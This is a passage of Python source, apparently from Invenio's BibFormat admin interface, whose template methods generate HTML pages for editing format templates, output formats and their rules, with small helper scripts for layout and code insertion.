out += '''<option value="%(template_filename)s">%(template_name)s</option>''' % {'template_name': o_name,
'template_filename': o_filename}
out += ''' </select>
</td></tr></table>'''
out += '''
<table><tr>
<th colspan="2" class="adminheaderleft">%(name)s attributes [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#attrsFormatTemplate">?</a>]</th>
</tr>
<tr>
<td class="admintdright">
<input type="hidden" name="key" value="%(name)s"/>
<label for="name">%(name_label)s</label>: </td>
<td><input tabindex="2" name="name" type="text" id="name" size="25" value="%(name)s" %(readonly)s/>
<input type="hidden" value="%(filename)s"/>
</td>
</tr>
''' % {'name': name,
'filename': filename,
'readonly': readonly,
'name_label': _("Name"),
'siteurl': CFG_SITE_URL
}
out += '''
<tr>
<td class="admintdright" valign="top"><label for="description">%(description_label)s</label>: </td>
<td><textarea tabindex="3" name="description" id="description" rows="4" cols="25" %(readonly)s>%(description)s</textarea> </td>
</tr>
<tr>
<td> </td>
<td align="right"><input tabindex="6" class="adminbutton" type="submit" value="%(update_format_attributes)s" %(disabled)s/></td>
</tr>
</table></form>
''' % {"description": description,
'disabled': disabled,
'readonly': readonly,
'description_label': _("Description"),
'update_format_attributes': _("Update Format Attributes"),
}
return out
def tmpl_admin_format_template_show_dependencies(self, ln, name, filename, output_formats, format_elements, tags):
"""
Shows the dependencies (on elements) of the given format.
@param ln: language
@param name: the name of the template
@param filename: the filename of the template
@param format_elements: the elements (and list of tags in each element) this template depends on
@param output_formats: the output format that depend on this template
@param tags: the tags that are called by format elements this template depends on.
@return: HTML markup
"""
_ = gettext_set_language(ln) # load the right message language
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(close_editor)s</a> </small></td>
<td>1. <small><a href="format_template_show?ln=%(ln)s&bft=%(filename)s">%(template_editor)s</a></small> </td>
<td>2. <small><a href="format_template_show_attributes?ln=%(ln)s&bft=%(filename)s">%(modify_template_attributes)s</a></small> </td>
<td>3. <small>%(check_dependencies)s</small> </td>
</tr>
</table>
<table width="90%%" class="admin_wvar" cellspacing="0"><tr>
<th class="adminheaderleft">Output Formats that use %(name)s</th>
<th class="adminheaderleft">Format Elements used by %(name)s*</th>
<th class="adminheaderleft">All Tags Called*</th>
</tr>
<tr>
<td valign="top"> <br/>
''' % {'ln': ln,
'filename': filename,
'menu': _("Menu"),
'close_editor': _("Close Editor"),
'modify_template_attributes': _("Modify Template Attributes"),
'template_editor': _("Template Editor"),
'check_dependencies': _("Check Dependencies"),
'name': name}
#Print output formats
if len(output_formats) == 0:
out += '<p align="center"><i>No output format uses this format template.</i></p>'
for output_format in output_formats:
name = output_format['names']['generic']
filename = output_format['filename']
out += ''' <a href="output_format_show?ln=%(ln)s&bfo=%(filename)s">%(name)s</a>''' % {'filename': filename,
'name': name,
'ln': ln}
if len(output_format['tags']) > 0:
out += "("+", ".join(output_format['tags'])+")"
out += "<br/>"
#Print format elements (and tags)
out += '</td><td valign="top"> <br/>'
if len(format_elements) == 0:
out += '<p align="center"><i>This format template uses no format element.</i></p>'
for format_element in format_elements:
name = format_element['name']
out += ''' <a href="format_elements_doc?ln=%(ln)s#%(anchor)s">%(name)s</a>''' % {'name': "bfe_"+name.lower(),
'anchor': name.upper(),
'ln': ln}
if len(format_element['tags']) > 0:
out += "("+", ".join(format_element['tags'])+")"
out += "<br/>"
#Print tags
out += '</td><td valign="top"> <br/>'
if len(tags) == 0:
out += '<p align="center"><i>This format template uses no tag.</i></p>'
for tag in tags:
out += '''%(tag)s<br/>''' % {'tag': tag}
out += '''
</td>
</tr>
</table>
<b>*Note</b>: Some tags linked with this format template might not be shown. Check manually.
'''
return out
def tmpl_admin_format_template_show(self, ln, code, filename,
ln_for_preview, pattern_for_preview,
editable, content_type_for_preview,
content_types):
"""
Returns the editor for format templates. Edit format with given X{name}
@param ln: language
@param name: the format to edit
@param description: the description of the format template
@param code: the code of the template of the editor
@param filename: the filename of the template
@param ln_for_preview: the language for the preview (for bfo)
@param pattern_for_preview: the search pattern to be used for the preview (for bfo)
@param editable: True if we let user edit, else False
@param content_type_for_preview: content-type to use for preview
@param content_types: list of available content-types
@return: editor for 'format'
"""
_ = gettext_set_language(ln) # load the right message language
out = ""
# If xsl, hide some options in the menu
nb_menu_options = 4
if filename.endswith('.xsl'):
nb_menu_options = 2
out += '''
<style type="text/css">
<!--
.ed_button {
font-size: x-small;
}
-->
</style>
<script src="%(quicktags)s" type="text/javascript"></script>
<script type="text/javascript">
/* Ask user confirmation before leaving page */
var user_must_confirm_before_leaving_page = false;
window.onbeforeunload = confirmExit;
function confirmExit() {
if (user_must_confirm_before_leaving_page)
return "%(leave_editor_message)s";
}
function getByID( id ) {
if (document.getElementById)
var returnVar = document.getElementById(id);
else if (document.all)
var returnVar = document.all[id];
else if (document.layers)
var returnVar = document.layers[id];
return returnVar;
}
window.onresize= resizeViews;
window.onload= prepareLayout;
function prepareLayout(){
resizeViews();
}
function resizeViews(){
var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
//IE 6+ in 'standards compliant mode'
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
//IE 4 compatible
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}
if (myHeight <= 400) {
getByID("code").style.height=10;
getByID("previewiframe").style.height=10;
} else{
getByID("code").style.height=((myHeight-400)/2);
getByID("previewiframe").style.height=((myHeight-400)/2);
}
getByID("previewiframe").style.height=200;
// Resize documentation
var height = document.documentElement.clientHeight;
height -= getByID('shortDocFrame').offsetTop
//height -= 20;
getByID('shortDocFrame').style.height = height +"px";
}
</script>
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="%(nb_menu_options)s" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(close_editor)s</a></small> </td>
<td>1. <small>%(template_editor)s</small> </td>
''' % {'ln': ln,
'menu': _("Menu"),
'close_editor': _("Close Editor"),
'template_editor': _("Template Editor"),
'nb_menu_options': nb_menu_options,
'siteurl': CFG_SITE_SECURE_URL or CFG_SITE_URL,
'leave_editor_message': _('Your modifications will not be saved.').replace('"', '\\"'),
'quicktags': url_for('formatter.static',
filename='js/formatter/quicktags.js'),
}
if not filename.endswith('.xsl'):
out +='''<td>2. <small><a href="format_template_show_attributes?ln=%(ln)s&bft=%(filename)s">%(modify_template_attributes)s</a></small> </td>
<td>3. <small><a href="format_template_show_dependencies?ln=%(ln)s&bft=%(filename)s">%(check_dependencies)s</a></small> </td>
''' % {'ln': ln,
'filename': filename,
'modify_template_attributes': _("Modify Template Attributes"),
'check_dependencies': _("Check Dependencies"),
}
out +='''
</tr>
</table>
<script type="text/javascript">
function toggle_doc_visibility(){
var doc = document.getElementById('docTable');
var link = document.getElementById('docLink');
if (doc.style.display=='none'){
doc.style.display = '';
link.innerHTML = "%(label_hide_doc)s"
} else {
doc.style.display = 'none';
link.innerHTML = "%(label_show_doc)s"
}
}
</script>
''' % {'label_show_doc': _("Show Documentation"),
'label_hide_doc': _("Hide Documentation"),
}
disabled = ""
readonly = ""
toolbar = """<script type="text/javascript">edToolbar('%s/admin/bibformat/bibformatadmin.py/format_elements_doc?ln=%s');</script>""" % (CFG_SITE_URL, ln)
if not editable:
disabled = 'disabled="disabled"'
readonly = 'readonly="readonly"'
toolbar = ''
#First column: template code and preview
out += '''
<table width="90%%" cellspacing="5">
<tr>
<td valign="top">
<form action="format_template_show_preview_or_save?ln=%(ln)s&bft=%(filename)s" method="POST" target="previewiframe">
<table width="100%%" id="mainTable"><tr>
<th class="adminheaderleft"><div style="float:left;">Format template code</div>
<div style="float:right;">
<a id="docLink" href="#" onclick="toggle_doc_visibility()">%(label_hide_doc)s</a>
</div>
</th>
</tr>
<tr><td colspan="2" id="codetd">
%(toolbar)s
<textarea name="code" id="code" rows="25" %(readonly)s
style="width:100%%" onchange="user_must_confirm_before_leaving_page=true;">%(code)s</textarea>
<script type="text/javascript">var edCanvas = document.getElementById('code');</script>
</td></tr>
<tr><td align="right" valign="top">
<input type="submit" class="adminbutton" name="save_action" value="Save Changes" onclick="user_must_confirm_before_leaving_page=false;" %(disabled)s/>
</td>
</tr>
</table>
<table width="100%%">
<tr><th class="adminheaderleft">
Preview
</th>
</tr>
<tr><td align="right" valign="top" style="font-size: small;">
<nobr>
<label for="content_type_for_preview">Content-type (MIME):</label> <select id="content_type_for_preview" name="content_type_for_preview" style="font-size: x-small;">
''' % {'ln': ln,
'filename': filename,
'label_hide_doc': _("Hide Documentation"),
'code': code,
'readonly': readonly,
'disabled': disabled,
'toolbar': toolbar}
for content_type in content_types:
if content_type == content_type_for_preview:
out += '''<option value="%(content_type)s" selected="selected">%(content_type)s</option>''' % {'content_type': content_type}
else:
out += '''<option value="%(content_type)s">%(content_type)s</option>''' % {'content_type': content_type}
out += '''
</select></nobr>
<nobr><label for="ln_for_preview">Language:</label> <select id="ln_for_preview" name="ln_for_preview" style="font-size: x-small;">
'''
for lang in language_list_long():
if lang[0] == ln_for_preview:
out += '''<option value="%(ln)s" selected="selected">%(language)s</option>''' % {'ln': lang[0],
'language': lang[1]}
else:
out += '''<option value="%(ln)s">%(language)s</option>''' % {'ln': lang[0], 'language': lang[1]}
out += '''
</select></nobr>
<nobr><label for="pattern_for_preview">Search Pattern: </label><input type="text" value="%(pattern_for_preview)s" size="8" name="pattern_for_preview" id="pattern_for_preview" style="font-size: x-small;"/></nobr>
<input type="submit" class="adminbutton" name="preview_action" value="Reload Preview"/>
</td>
</tr>
<tr><td>
<iframe src ="%(siteurl)s/admin/bibformat/bibformatadmin.py/format_template_show_preview_or_save?ln=%(ln)s&ln_for_preview=%(ln_for_preview)s&pattern_for_preview=%(pattern_for_preview)s&bft=%(filename)s" name="previewiframe" id="previewiframe" width="100%%" height="400"></iframe>
</td></tr>
</table>
</form>
</td>
''' % {'ln': ln,
'siteurl': CFG_SITE_URL, 'filename': filename,
'ln_for_preview': ln_for_preview,
'pattern_for_preview': pattern_for_preview
}
#Second column Print documentation
out += '''
<td valign="top" id="docTable">
<table width="100%%"><tr>
<th class="adminheaderleft">Elements Documentation</th>
</tr>
</table>
<table width="100%%"><tr>
<td class="admintdright">
<form action="format_template_show_short_doc?ln=%(ln)s" method="POST" target="shortDocFrame">
<nobr><label for="search_doc_pattern">Search for: </label><input type="text" size="15" name="search_doc_pattern" id="search_doc_pattern" value=""/> <input type="submit" class="adminbutton" name="search_in_doc" value="Search" /></nobr>
</form>
</td>
</tr>
</table>
<iframe name="shortDocFrame" id="shortDocFrame" src ="%(siteurl)s/admin/bibformat/bibformatadmin.py/format_template_show_short_doc?ln=%(ln)s" height="90%%" width="98%%"></iframe>
</td>
</tr>
</table>
''' % {'siteurl': CFG_SITE_URL, 'ln': ln}
return out
def tmpl_admin_format_template_show_short_doc(self, format_elements):
"""
Prints the format element documentation in a condensed way to display
inside format template editor.
This page is different from others: it is displayed inside a <iframe>
tag in template tmpl_admin_format_template_show.
@param ln: language
@param format_elements: a list of format elements structures as returned by get_format_elements
@return: HTML markup
"""
out = '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>BibFormat Short Documentation of Format Elements</title>
<link rel="stylesheet" href="%(siteurl)s/img/invenio.css">
<script src="%(quicktags)s" type="text/javascript"></script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script type="text/javascript">
function toggle_visibility(element, show, r,g,b){
var children = element.childNodes
var child
for(x=0; x<children.length; x++){
if (children[x].id == 'params'){
child = children[x]
}
}
if (show=='show'){
element.style.background='rgb(201, 218, 255)'
element.style.cursor='pointer'
child.style.display=''
} else {
element.style.background="rgb("+r+","+g+","+b+")"
child.style.display='none'
}
}
///// FROM JS QuickTags ///////
// Copyright (c) 2002-2005 Alex King
// http://www.alexking.org/
//
// Licensed under the LGPL license
// http://www.gnu.org/copyleft/lesser.html
function insertAtCursor(myField, myValue) {
//IE support
if (document.selection) {
myField.focus();
sel = document.selection.createRange();
sel.text = myValue;
}
//MOZILLA/NETSCAPE support
else if (myField.selectionStart || myField.selectionStart == '0') {
var startPos = myField.selectionStart;
var endPos = myField.selectionEnd;
myField.value = myField.value.substring(0, startPos)
+ myValue
+ myField.value.substring(endPos, myField.value.length);
} else {
myField.value += myValue;
}
}
///// END FROM JS QuickTags /////
function insert_my_code_into_container(code){
var codeArea = parent.document.getElementById("code");
if (codeArea.readOnly == false){
//var clean_code = code.replace(=#,'="');
//clean_code = clean_code.replace(# ,'" ');
insertAtCursor(codeArea, code);
}
}
</script>
''' % {
'siteurl': CFG_SITE_SECURE_URL or CFG_SITE_URL,
'quicktags': url_for('formatter.static',
filename='js/formatter/quicktags.js')
}
if len(format_elements) == 0:
out += '''
<em>No format elements found</em>
'''
else:
line = 0
#Print elements doc
for format_element in format_elements:
format_attributes = format_element['attrs']
row_content = ""
name = format_attributes['name']
description = format_attributes['description']
params = [x['name'] + '=\u0022'+str(x['default'])+'\u0022' for x in format_attributes['params']]
builtin_params = [x['name'] + '=\u0022'+str(x['default'])+'\u0022' for x in format_attributes['builtin_params']]
code = "<BFE_" + name + ' ' + ' '.join(builtin_params)+ ' ' + ' '.join(params) +"/>"
if line % 2:
row_content += '''<div onmouseover="toggle_visibility(this, 'show', 235, 247, 255);"
onmouseout="toggle_visibility(this, 'hide', 235, 247, 255);"
style="background-color: rgb(235, 247, 255);"
onclick="insert_my_code_into_container('%s')"
><hr/>''' % code
else:
row_content += '''<div onmouseover="toggle_visibility(this, 'show', 255, 255, 255);"
onmouseout="toggle_visibility(this, 'hide', 255, 255, 255);"
onclick="insert_my_code_into_container('%s')"
>''' % code
row_content += '''
<code> <b><BFE_%(name)s/></b><br/></code>
<small>%(description)s.</small>
<div id="params" style="display:none;">
<ul>
''' % {'name': name, 'description': description}
for param in format_attributes['params']:
row_content += '''
<li><small><b>%(name)s</b>: %(description)s</small></li>
''' % {'name': param['name'],
'description': param['description']}
for param in format_attributes['builtin_params']:
row_content += '''
<li><small><b>%(name)s</b>: %(description)s</small></li>
''' % {'name': param['name'],
'description': param['description']}
row_content += '</ul></div>'
if line % 2:
row_content += '''<hr/></div>'''
else:
row_content += '</div>'
line += 1
out += row_content
out += '''</body></html>'''
return out
def tmpl_admin_format_templates_management(self, ln, formats):
"""
Returns the management console for formats. Includes list of formats and
associated administration tools.
@param ln: language
@param formats: a list of dictionaries with formats attributes
@return: format management console as html
"""
_ = gettext_set_language(ln) # load the right message language
#top of the page and table header
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small>%(manage_format_templates)s</small> </td>
<td>1. <small><a href="output_formats_manage?ln=%(ln)s">%(manage_output_formats)s</a> </td>
<td>2. <small><a href="format_elements_doc?ln=%(ln)s">%(format_elements_documentation)s</a></small> </td>
</tr>
</table>
<p>From here you can create, edit or delete formats templates.
Have a look at the <a href="format_elements_doc?ln=%(ln)s">format elements documentation</a> to
learn which elements you can use in your templates.</p>
<table class="admin_wvar" width="95%%" cellspacing="0">
<tr>
<th class="adminheaderleft" > </th>
<th class="adminheaderleft" >%(name)s</th>
<th class="adminheaderleft" >%(description)s</th>
<th class="adminheaderleft" >%(status)s</th>
<th class="adminheaderleft" >%(last_modification_date)s</th>
<th class="adminheadercenter" >%(action)s [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#formatTemplates">?</a>]</th>
</tr>
''' % {'name': _("Name"),
'description': _("Description"),
'menu': _("Menu"),
'status': _("Status"),
'last_modification_date': _("Last Modification Date"),
'action': _("Action"),
'ln': ln,
'manage_output_formats': _("Manage Output Formats"),
'manage_format_templates': _("Manage Format Templates"),
'format_elements_documentation': _("Format Elements Documentation"),
'siteurl': CFG_SITE_URL}
#table content: formats names, description and buttons
if len(formats) == 0:
out += '''<tr>
<td colspan="6" class="admintd" align="center"><em>No format</em></td>
</tr>'''
else:
line = 0
for attrs in formats:
filename = attrs['filename']
if filename == "":
filename = " "
name = attrs['name']
if name == "":
name = " "
description = attrs['description']
if description == "":
description = " "
last_mod_date = attrs['last_mod_date']
status = attrs['status']
disabled = ""
if not attrs['editable']:
disabled = 'disabled="disabled"'
style = 'style="vertical-align: middle;'
if line % 2:
style = 'style="vertical-align: middle;background-color: rgb(235, 247, 255);'
line += 1
row_content = '''<tr>
<td class="admintdright" %(style)s"> </td>
<td class="admintdleft" %(style)s white-space: nowrap;"><a href="format_template_show?bft=%(filename)s&ln=%(ln)s">%(name)s</a></td>
<td class="admintdleft" %(style)s" >%(description)s</td>
<td class="admintdleft" %(style)s white-space: nowrap;" >%(status)s</td>
<td class="admintdleft" %(style)s white-space: nowrap;" >%(last_mod_date)s</td>
<td class="admintd" %(style)s white-space: nowrap;">
<form method="post" action="format_template_delete?ln=%(ln)s&bft=%(filename)s">
<input class="adminbutton" type="submit" value="%(delete)s" %(disabled)s/>
</form>
</td>
</tr>
''' % {'filename': filename,
'name': name,
'description': description,
'ln': ln,
'style': style,
'disabled': disabled,
'last_mod_date': last_mod_date,
'status': status,
'delete': _("Delete")
}
out += row_content
#table footer, buttons and bottom of the page
out += '''
<tr>
<td align="left" colspan="3">
<form action="format_templates_manage?ln=%(ln)s">
<input type="hidden" name="checking" value="1"></input>
<input class="adminbutton" type="submit" value="%(extensive_checking)s"/>
</form>
</td>
<td align="right" colspan="3">
<form action="format_template_add?ln=%(ln)s">
<input class="adminbutton" type="submit" value="%(add_format_template)s"/>
</form>
</td>
</tr>
</table>
''' % {'ln': ln,
'add_format_template': _("Add New Format Template"),
'extensive_checking': _("Check Format Templates Extensively")}
return out
def tmpl_admin_output_formats_management(self, ln, output_formats):
"""
Returns the main management console for formats. Includes list of formats and
associated administration tools.
@param ln: language
@param output_formats: a list of output formats
@return: main management console as html
"""
_ = gettext_set_language(ln) # load the right message language
#top of the page and table header
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(manage_format_templates)s</a></small> </td>
<td>1. <small>%(manage_output_formats)s</small> </td>
<td>2. <small><a href="format_elements_doc?ln=%(ln)s">%(format_elements_documentation)s</a></small> </td>
</tr>
</table>
<p>From here you can add, edit or delete output formats available for collections. Output formats define which template to use. <br/>To edit templates go to the <a href="format_templates_manage?ln=%(ln)s">template administration page</a>.</p>
<table class="admin_wvar" width="95%%" cellspacing="0">
<tr>
<th class="adminheaderleft" > </th>
<th class="adminheaderleft" ><a href="output_formats_manage?ln=%(ln)s&sortby=code">%(code)s</a></th>
<th class="adminheaderleft" ><a href="output_formats_manage?ln=%(ln)s&sortby=name">%(name)s</a></th>
<th class="adminheaderleft" >%(description)s</th>
<th class="adminheaderleft" >%(status)s</th>
<th class="adminheaderleft" >%(last_modification_date)s</th>
<th class="adminheadercenter" >%(action)s [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#outputFormats">?</a>]</th>
</tr>
''' % {'code': _("Code"),
'name': _("Name"),
'description': _("Description"),
'status': _("Status"),
'last_modification_date': _("Last Modification Date"),
'action': _("Action"),
'ln': ln,
'manage_output_formats': _("Manage Output Formats"),
'manage_format_templates': _("Manage Format Templates"),
'format_elements_documentation': _("Format Elements Documentation"),
'menu': _("Menu"),
'siteurl': CFG_SITE_URL}
#table content: formats names, description and buttons
if len(output_formats) == 0:
out += '''<tr>
<td colspan="5" class="admintd" align="center"><em>No format</em></td>
</tr>'''
else:
line = 0
for output_format in output_formats:
format_attributes = output_format['attrs']
name = format_attributes['names']['generic']
if name == "":
name = " "
description = format_attributes['description']
if description == "":
description = " "
code = format_attributes['code']
if code == "":
code = " "
last_mod_date = output_format['last_mod_date']
status = output_format['status']
disabled = ""
if not output_format['editable']:
disabled = 'disabled="disabled"'
style = "vertical-align: middle;"
if line % 2:
style = 'vertical-align: middle; background-color: rgb(235, 247, 255);'
line += 1
row_content = '''<tr>
<td class="admintdright" style="%(style)s"> </td>
<td class="admintdleft" style="white-space: nowrap; %(style)s">
<a href="output_format_show?bfo=%(code)s">%(code)s</a>
</td>
<td class="admintdleft" style="white-space: nowrap; %(style)s">
<a href="output_format_show?bfo=%(code)s">%(name)s</a>
</td>
<td class="admintdleft"style="%(style)s" >
%(description)s
</td>
<td class="admintd" style="white-space: nowrap; %(style)s" >%(status)s</td>
<td class="admintdleft" style="white-space: nowrap;%(style)s" >%(last_mod_date)s</td>
<td class="admintd" style="white-space: nowrap; %(style)s">
<form method="POST" action="output_format_delete?ln=%(ln)s&bfo=%(code)s">
<input class="adminbutton" type="submit" value="Delete" %(disabled)s />
</form>
</td>
</tr>
''' % {'style': style,
'code': code,
'description': description,
'name': name,
'ln': ln,
'disabled': disabled,
'last_mod_date': last_mod_date,
'status': status}
out += row_content
#table footer, buttons and bottom of the page
out += '''
<tr>
<td align="right" colspan="7">
<form method="GET" action="output_format_add?ln=%(ln)s">
<input class="adminbutton" type="submit" value="%(add_output_format)s"/>
</form>
</td>
</tr>
</table>
''' % {'ln': ln,
'add_output_format': _("Add New Output Format")}
return out
def tmpl_admin_output_format_show(self, ln, code, rules, default,
format_templates, editable):
"""
Returns the content of an output format
rules is an ordered list of dict (sorted by evaluation order),
with keys 'field', 'value' and 'template'
IMPORTANT: we display rules evaluation index starting at 1 in
interface, but we start internally at 0
@param ln: language
@param code: the code of the output to show
@param name: the name of this output format
@param rules: the list of rules for this output format
@param default: the default format template of the output format
@param format_templates: the list of format_templates
@param editable: True if we let user edit, else False
@return: the management console for this output format
"""
_ = gettext_set_language(ln)
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="output_formats_manage?ln=%(ln)s">%(close_output_format)s</a></small> </td>
<td>1. <small>%(rules)s</small> </td>
<td>2. <small><a href="output_format_show_attributes?ln=%(ln)s&bfo=%(code)s">%(modify_output_format_attributes)s</a></small> </td>
<td>3. <small><a href="output_format_show_dependencies?ln=%(ln)s&bfo=%(code)s">%(check_dependencies)s</a></small> </td>
</tr>
</table>
<p>Define here the rules the specifies which template to use for a given record.</p>
''' % {'code': code,
'ln': ln,
'menu': _("menu"),
'close_output_format': _("Close Output Format"),
'rules': _("Rules"),
'modify_output_format_attributes': _("Modify Output Format Attributes"),
'check_dependencies': _("Check Dependencies")
}
out += '''
<form name="rules" action="output_format_show?ln=%(ln)s&bfo=%(code)s" method="post">
<table>
<tr>
<td>
''' % {'ln': ln, 'code': code}
disabled = ""
readonly = ""
if not editable:
disabled = 'disabled="disabled"'
readonly = 'readonly="readonly"'
if len(rules) == 0:
out += '''<p align="center"><em>No special rule</em></p>'''
line = 1
for rule in rules:
out += '''
<table align="center" class="admin_wvar" cellspacing="0">
<tr>
'''
out += '''
<td rowspan="2" class="adminheader" style="vertical-align: middle;">'''
if line > 1:
out += '''
<input type="image" src="%(siteurl)s/img/smallup.gif" alt="Increase priority of rule %(row)s" name="+ %(row)s" value="+ %(row)s" %(disabled)s/></div>
''' % {'siteurl': CFG_SITE_URL, 'row': line, 'disabled': disabled}
out += '''<div>%(row)s</div>''' % {'row': line}
if line < len(rules):
out += '''
<input type="image" src="%(siteurl)s/img/smalldown.gif" alt="Decrease priority of rule %(row)s" name="- %(row)s" value="- %(row)s" %(disabled)s/>
''' % {'siteurl': CFG_SITE_URL,
'row': line,
'disabled': disabled}
out += '''</td>
<td class="adminheaderleft"> </td>
'''
out += '''
<td class="adminheaderleft" style="white-space: nowrap;">
Use template <select name="r_tpl" %(disabled)s>''' % {'disabled': disabled}
for template in format_templates:
attrs = format_templates[template]['attrs']
attrs['template'] = template
if template.endswith('.xsl') and not \
attrs['name'].endswith(' (XSL)'):
attrs['name'] += ' (XSL)'
if template != rule['template']:
out += '''<option value="%(template)s">%(name)s</option>''' % attrs
else:
out += '''<option value="%(template)s" selected="selected">%(name)s</option>''' % attrs
if rule['template'] not in format_templates and rule['template'] != "":
#case where a non existing format template is use in output format
#we need to add it as option
out += '''<option value="%s" selected="selected">%s</option>''' % (rule['template'],
rule['template'])
out += '''</select> if field
<input type="text" name="r_fld" value="%(field)s" size="10" %(readonly)s/> is equal to <input type="text" value="%(value)s" name="r_val" %(readonly)s/>
</td>
<td class="adminheaderright" style="vertical-align: middle;">
[<a href="%(siteurl)s/help/admin/bibformat-admin-guide#rulesOutputFormat">?</a>]
</td>
</tr>
''' % {'siteurl': CFG_SITE_URL,
'field': rule['field'],
'value': rule['value'],
'readonly': readonly}
out += '''
<tr>
<td colspan ="3" class="adminheaderright" style="vertical-align: middle; white-space: nowrap;">
<input type="submit" class="adminbutton" name="r_upd" value="%(remove_rule_label)s %(row)s" %(disabled)s/>
</td>
</tr>
</table>
''' % {'remove_rule_label': _("Remove Rule"),
'row': line,
'disabled': disabled}
line += 1
out += '''
<table width="100%" align="center" class="admin_wvar" cellspacing="0">
<tr>
'''
out += '''
<td width="30" class="adminheaderleft"> </td>
<td class="adminheaderleft">By default use <select id="default" name="default" %(disabled)s>''' % {'disabled': disabled}
for template in format_templates:
attrs = format_templates[template]['attrs']
attrs['template'] = template
if template.endswith('.xsl') and not \
attrs['name'].endswith(' (XSL)'):
attrs['name'] += ' (XSL)'
if template != default:
out += '''<option value="%(template)s">%(name)s</option>''' % attrs
else:
out += '''<option value="%(template)s" selected="selected">%(name)s</option>''' % attrs
if default not in format_templates and default != "":
#case where a non existing format tempate is use in output format
#we need to add it as option (only if it is not empty string)
out += '''<option value="%s" selected="selected">%s</option>''' % (default, default)
out += '''</select></td>
</tr>
</table>
<div align="right">
<input tabindex="6" class="adminbutton" type="submit" name="r_upd" value="%(add_new_rule_label)s" %(disabled)s/>
<input tabindex="7" class="adminbutton" type="submit" name="r_upd" value="%(save_changes_label)s" %(disabled)s/>
</div>
</td>
</tr>
</table>
</form>
''' % {'add_new_rule_label': _("Add New Rule"),
'save_changes_label': _("Save Changes"),
'disabled': disabled
}
return out
def tmpl_admin_output_format_show_attributes(self, ln,
name,
description,
content_type,
code,
names_trans,
editable,
visible):
"""
Returns a page to change output format name and description
names_trans is an ordered list of dicts with keys 'lang' and 'trans'
@param ln: language
@param name: the name of the format
@param description: the description of the format
@param code: the code of the format
@param content_type: the (MIME) content type of the ouput format
@param names_trans: the translations in the same order as the languages from get_languages()
@param editable: True if we let user edit, else False
@param visible: True if output format should be shown in list of available output formats
@return: editor for output format attributes
"""
_ = gettext_set_language(ln) # load the right message language
out = ""
out += '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="output_formats_manage?ln=%(ln)s">%(close_output_format)s</a></small> </td>
<td>1. <small><a href="output_format_show?ln=%(ln)s&bfo=%(code)s">%(rules)s</a></small> </td>
<td>2. <small>%(modify_output_format_attributes)s</small> </td>
<td>3. <small><a href="output_format_show_dependencies?ln=%(ln)s&bfo=%(code)s">%(check_dependencies)s</a></small> </td>
</tr>
</table><br/>
''' % {'ln': ln,
'code': code,
'close_output_format': _("Close Output Format"),
'rules': _("Rules"),
'modify_output_format_attributes': _("Modify Output Format Attributes"),
'check_dependencies': _("Check Dependencies"),
'menu': _("Menu")
}
disabled = ""
readonly = ""
if not editable:
disabled = 'disabled="disabled"'
readonly = 'readonly="readonly"'
out += '''
<form action="output_format_update_attributes?ln=%(ln)s&bfo=%(code)s" method="POST">
<table class="admin_wvar" cellspacing="0">
<tr>
<th colspan="2" class="adminheaderleft">
Output Format Attributes [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#attrsOutputFormat">?</a>]</th>
</tr>
<tr>
<td class="admintdright"><label for="outputFormatCode">Code</label>: </td>
<td><input tabindex="0" name="code" type="text" id="outputFormatCode" maxlength="6" size="6" value="%(code)s" %(readonly)s/></td>
</tr>
<tr>
<td class="admintdright">Visibility: </td>
<td><input tabindex="1" name="visibility" type="checkbox" id="outputFormatVisibility" %(visibility)s %(disabled)s value="1" /><small><label for="outputFormatVisibility">Show in list of available output formats (on public pages)</label></small></td>
</tr>
<td class="admintdright"><label for="outputFormatContentType">Content type</label>: </td>
<td><input tabindex="2" name="content_type" type="text" id="outputFormatContentType" size="25" value="%(content_type)s" %(readonly)s/> <small>Mime content-type. Specifies how the browser should handle this output.</small></td>
<tr>
<td class="admintdright"><label for="outputFormatName">Name</label>: </td>
<td><input tabindex="3" name="name" type="text" id="outputFormatName" size="25" value="%(name)s" %(readonly)s/></td>
</tr>
''' % {'name': name,
'ln': ln,
'code': code,
'content_type': content_type,
'readonly': readonly,
'siteurl': CFG_SITE_URL,
'visibility': visible == 1 and 'checked="checked"' or '',
'disabled': disabled}
#Add translated names
i = 3
for name_trans in names_trans:
i += 1
out += '''
<tr>
<td class="admintdright"><label for="outputFormatName%(i)s">%(lang)s Name</label>: </td>
<td><input tabindex="%(i)s" name="names_trans" type="text" id="outputFormatName%(i)s" size="25" value="%(name)s" %(readonly)s/></td>
</tr>''' % {'name': name_trans['trans'],
'lang': name_trans['lang'],
'i': i,
'readonly': readonly}
#Description and end of page
out += '''
<tr>
<td class="admintdright" valign="top"><label for="outputFormatDescription">Description</label>: </td>
<td><textarea tabindex="%(tabindexdesc)s" name="description" id="outputFormatDescription" rows="4" cols="25" %(readonly)s>%(description)s</textarea> </td>
</tr>
<tr>
